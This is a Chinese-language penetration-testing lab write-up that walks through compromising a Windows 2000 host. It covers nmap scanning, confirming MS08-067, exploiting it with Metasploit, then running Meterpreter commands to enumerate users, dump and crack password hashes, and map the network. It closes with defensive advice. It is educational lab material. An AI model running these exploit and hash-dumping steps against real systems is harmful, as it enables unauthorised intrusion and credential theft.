渗透测试学习笔记之案例二
字数 1824 2025-08-29 08:31:41
渗透测试案例二:Windows 2000服务器渗透实战
0x00 实验环境
- 目标靶机: 10.11.1.227 (Windows 2000)
- 攻击机: Kali Linux (10.11.0.38)
0x01 信息收集阶段
1.1 初始扫描
使用nmap进行端口和服务扫描:
nmap -sV -O -Pn 10.11.1.227
扫描结果分析:
-
开放端口及服务:
- 135/tcp: msrpc (Microsoft Windows RPC)
- 139/tcp: netbios-ssn
- 445/tcp: microsoft-ds (Windows 2000)
- 1025-1026/tcp: msrpc
- 3372/tcp: msdtc (Microsoft Distributed Transaction Coordinator)
- 5800/tcp: vnc-http (RealVNC 4.0)
- 5900/tcp: vnc
-
操作系统识别:Windows 2000
1.2 漏洞验证
针对SMB服务进行MS08-067漏洞验证:
nmap --script=/usr/share/nmap/scripts/smb-vuln-ms08-067.nse -sT -Pn 10.11.1.227
验证结果:
- 确认存在MS08-067漏洞 (CVE-2008-4250)
- 影响系统:Windows 2000 SP4
0x02 漏洞利用阶段
2.1 使用Metasploit进行攻击
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 10.11.1.227
msf exploit(ms08_067_netapi) > exploit
攻击结果:
- 成功获取Meterpreter会话
- 当前权限:NT AUTHORITY\SYSTEM (最高权限)
0x03 后渗透阶段
3.1 系统信息收集
获取系统信息:
meterpreter > sysinfo
- 操作系统:Windows 2000 (Build 2195)
- 架构:x86
- 语言:en_US
- 域:WORKGROUP
获取进程列表:
meterpreter > ps
- 关键进程:winvnc4.exe (RealVNC服务)
3.2 用户信息收集
获取本地用户:
meterpreter > shell
C:\WINNT\system32> net users
- 用户列表:admin, Administrator, backup, david, gary等
获取管理员组用户:
C:\WINNT\system32> net localgroup administrators
- 管理员组成员:Administrator, backup
获取域信息:
C:\WINNT\system32> net view /domain
- 域列表:MYGROUPTHINC, WORKGROUP
3.3 密码哈希获取与破解
获取密码哈希:
meterpreter > hashdump
- 获取所有用户的LM/NTLM哈希
哈希破解结果:
| 用户名 | 密码 |
|---|---|
| backup | backup |
| Administrator | 7A6417Yrjh |
| admin | CHANGEME |
| david | 012345 |
| gary | REDGREENBLUE |
| john | password1 |
在线破解工具:
- http://www.objectif-securite.ch/en/ophcrack.php (LM Hash破解)
0x04 持续渗透准备
4.1 网络拓扑发现
查看网络配置:
C:\WINNT\system32> ipconfig -all
- IP地址:10.11.1.227
- 网关:10.11.1.220
- DNS:10.11.1.220, 10.11.1.221
发现网络共享:
C:\WINNT\system32> net view
- 网络主机:BETHANY, BOB2, CORY等
4.2 密码重用分析
- 整理获取的明文密码表
- 为后续横向移动准备凭证
0x05 技术要点总结
-
信息收集:
- 全面扫描目标开放端口和服务
- 识别操作系统版本和关键服务
-
漏洞利用:
- 针对老旧系统(如Windows 2000)优先考虑已知漏洞
- 使用nmap脚本验证漏洞存在性
- Metasploit提供成熟的漏洞利用模块
-
权限提升:
- 初始获取的SYSTEM权限无需提权
- 了解常见提权技术(Named Pipe Impersonation等)
-
后渗透技术:
- 系统信息收集(systeminfo, ipconfig等)
- 用户和组信息枚举
- 密码哈希获取与破解
- 网络拓扑发现
-
持续渗透准备:
- 密码重用分析
- 凭证整理与保存
- 网络共享发现
0x06 防御建议
-
针对MS08-067漏洞:
- 及时安装安全补丁(已停止支持的Windows 2000应考虑升级)
- 禁用不必要的SMB服务
-
密码安全:
- 使用复杂密码(避免简单密码如"password1")
- 禁用LM Hash存储(Windows 2000默认启用)
- 定期更换密码
-
系统加固:
- 限制管理员组用户数量
- 禁用不必要的服务(如VNC)
- 启用日志审计
-
网络隔离:
- 老旧系统应置于隔离网络
- 限制网络共享访问权限
-
监控措施:
- 监控异常登录行为
- 检测哈希传递攻击